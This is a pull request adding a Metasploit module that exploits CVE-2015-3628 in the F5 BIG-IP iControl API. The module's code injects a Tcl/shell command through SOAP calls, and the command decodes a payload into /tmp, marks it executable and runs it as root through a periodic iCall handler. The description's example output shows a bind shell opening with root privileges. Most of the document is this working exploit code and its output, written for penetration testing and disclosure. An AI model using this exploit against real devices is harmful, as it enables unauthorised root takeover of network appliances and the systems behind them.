### PR TITLE
F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)

### DIFF
--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -1,0 +1,321 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "F5 iControl iCall::Script Root Command Execution",
+      'Description'    => %q{
+        This module exploits an authenticated a privilege escalation vulnerability
+        in the iControl API on the F5 BIGIP LTM (and likely other F5 devices). The attacker needs valid
+        credentials and the Resource Administrator role.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'tom' # Discovery, Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-3628'],
+          ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
+          ['URL', 'XXX GDS BLOG']
+        ],
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+        [
+          ['F5 BIG-IP LTM 11.x', {}]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Sep 3 2015",
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          Opt::RPORT(443),
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),
+          OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
+          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
+        ], self.class)
+  end
+
+
+
+  # cmd is valid tcl script
+  def create_script(cmd)
+    scriptname = Rex::Text.rand_text_alpha_lower(5)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <scr:create soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+         <item>#{scriptname}</item></scripts>
+         <definitions xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+         <item>#{cmd}</item></definitions>
+      </scr:create>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200
+      return scriptname
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def delete_script(scriptname)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <scr:delete_script soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]" xmlns:urn="urn:iControl">
+<item>#{scriptname}</item>
+</scripts>
+      </scr:delete_script>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+
+    if res and res.code == 200
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def script_exists(scriptname)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:scr="urn:iControl:iCall/Script">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <scr:get_list soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200 and res.body =~ /\/Common\/#{scriptname}/
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def create_handler(scriptname, interval)
+    handler_name = Rex::Text.rand_text_alpha_lower(5)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <per:create soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <handlers xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+<item>#{handler_name}</item>
+</handlers>
+         <scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+<item>/Common/#{scriptname}</item>
+</scripts>
+         <intervals xsi:type="urn:Common.ULongSequence" soapenc:arrayType="xsd:long[]"  xmlns:urn="urn:iControl">
+<item>#{interval}</item>
+</intervals>
+      </per:create>
+   </soapenv:Body>
+</soapenv:Envelope>
+}
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200
+      return handler_name
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def delete_handler(handler_name)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:per="urn:iControl:iCall/PeriodicHandler" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <per:delete_handler soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <handlers xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+<item>#{handler_name}</item>
+</handlers>
+      </per:delete_handler>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def handler_exists(handler_name)
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:per="urn:iControl:iCall/PeriodicHandler">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <per:get_list soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"/>
+   </soapenv:Body>
+</soapenv:Envelope>
+}
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 200 and res.body =~ /\/Common\/#{handler_name}/
+      return true
+    else
+      if res and res.code == 401
+        print_error('401 Unauthorized')
+      end
+      return false
+    end
+  end
+
+  def check
+    # strategy: we'll send a create_script request, with empty name:
+    # if everything is ok, the server return a 500 error saying it doesn't like empty names
+    # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
+    # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
+    # any other response is considered not vulnerable
+    pay = %Q{<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+      xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
+      xmlns:scr="urn:iControl:iCall/Script" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
+   <soapenv:Header/>
+   <soapenv:Body>
+      <scr:create soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
+         <scripts xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+         <item></item></scripts>
+         <definitions xsi:type="urn:Common.StringSequence" soapenc:arrayType="xsd:string[]"  xmlns:urn="urn:iControl">
+         <item></item></definitions>
+      </scr:create>
+   </soapenv:Body>
+</soapenv:Envelope>
+    }
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),
+      'method' => 'POST',
+      'data' => pay,
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD']
+    })
+    if res and res.code == 500 and res.body =~ /path is empty/
+      return Exploit::CheckCode::Appears
+    elsif res and res.code == 401
+        print_error('401 Unauthorized')
+        return Exploit::CheckCode::Unknown
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    # phase 1: create iCall script to create file with payload, execute it and remove it.
+    filepath = '/tmp/'
+    filename = Rex::Text.rand_text_alpha_lower(5)
+    dest_file = filepath + filename
+    scriptname = Rex::Text.rand_text_alpha_lower(5)
+    print_status('Uploading payload...')
+
+    cmd = %Q@if { ! [file exists #{dest_file}]} { exec /bin/sh -c "echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{dest_file};@ +
+    %Q@chmod +x #{dest_file};#{dest_file};rm #{dest_file} "}@
+
+    script = create_script(cmd)
+    unless script
+      print_error("Upload script failed")
+      return false
+    end
+    unless script_exists(script)
+      print_error("create_script() run successfully but script was not found")
+    end
+    interval = 5
+
+    # phase 2: create iCall Handler, that will actually run the previously created script
+    print_status('Creating trigger...')
+    handler = create_handler(script, interval)
+    unless handler
+      print_error('Script uploaded but create_handler() failed')
+    end
+    print_status('Wait until payload is executed...')
+
+    sleep(interval+2) # small delay, just to make sure
+    print_status('Trying cleanup...')
+    unless delete_handler(handler) and delete_script(script)
+      print_error('Error while cleaning up')
+    else
+      print_status('Cleanup finished with no errors')
+    end
+
+  end
+end

--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['CVE', '2015-3628'],
           ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
-          ['URL', 'XXX GDS BLOG']
+          ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
         ],
       'Platform'       => ['unix'],
       'Arch'           => ARCH_CMD,

--- a/modules/exploits/linux/http/f5_icall_cmd.rb
+++ b/modules/exploits/linux/http/f5_icall_cmd.rb
@@ -15,8 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Name'           => "F5 iControl iCall::Script Root Command Execution",
       'Description'    => %q{
         This module exploits an authenticated a privilege escalation vulnerability
-        in the iControl API on the F5 BIGIP LTM (and likely other F5 devices). The attacker needs valid
-        credentials and the Resource Administrator role.
+        in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
+        credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
+        (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
       },
       'License'        => MSF_LICENSE,
       'Author'         =>


### PR DESCRIPTION
Module for F5 BIG-IP iCall privilege escalation vulnerability (CVE-2015-3628)

This modules exploits a privilege escalation bug in F5 BIG-IP 11.x and related products (see References for a complete listing)

The vulnerability is essentially an application logic bug that allows for command injection via a SOAP API which is enabled by default. The injected commands are executed as root.

The module requires valid credentials for a user with (at least) the *Resource Administrator* role.


### References

- https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html
- http://blog.gdssecurity.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html

### Example Output

```
msf > use exploit/linux/http/f5_icall_cmd
msf exploit(f5_icall_cmd) > show options

Module options (exploit/linux/http/f5_icall_cmd):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   admin            yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      443              yes       The target port
   SSL        true             yes       Use SSL
   TARGETURI  /                yes       The base path to the iControl installation
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   F5 BIG-IP LTM 11.x


msf exploit(f5_icall_cmd) > set RHOST 10.x.x.249
RHOST => 10.x.x.249
msf exploit(f5_icall_cmd) > set PAYLOAD cmd/unix/bind_perl
PAYLOAD => cmd/unix/bind_perl
msf exploit(f5_icall_cmd) > set LPORT 9999
msf exploit(f5_icall_cmd) > exploit

[*] Started bind handler
[*] Uploading payload...
[*] Creating trigger...
[*] Wait until payload is executed...
[*] Command shell session 2 opened (10.0.2.15:50556 -> 10.x.x.249:9999) at 2015-11-09 15:29:45 +0000
[*] Trying cleanup...
[*] Cleanup finished with no errors

id
uid=0(root) gid=0(root) context=system_u:system_r:init_t
```